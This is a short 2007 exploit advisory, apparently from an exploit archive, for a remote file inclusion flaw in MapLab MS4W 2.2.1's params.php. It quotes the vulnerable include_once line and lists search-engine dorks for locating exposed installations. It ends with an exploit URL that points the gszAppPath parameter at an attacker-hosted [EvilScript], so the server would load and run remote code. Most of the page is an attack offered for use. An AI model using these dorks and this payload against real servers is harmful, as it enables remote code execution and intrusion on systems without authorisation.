MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability
# Published : 2007-04-02
# Author : ka0x
# Previous Title : MySpeach <= 3.0.7 Remote/Local File Inclusion Vulnerability
# Next Title : PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability

Bug Found By ka0x
D.O.M TEAM
we are: anonyph;arp;ka0x;xarnuz
Contact: ka0x01@gmail.com
FROM SPAIN
---

Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org
Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip

--

Bug File: params.php
Path: /htdocs/gmapfactory/params.php

Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

--
Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

--

Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript] 

# www.Syue.com [2007-04-02]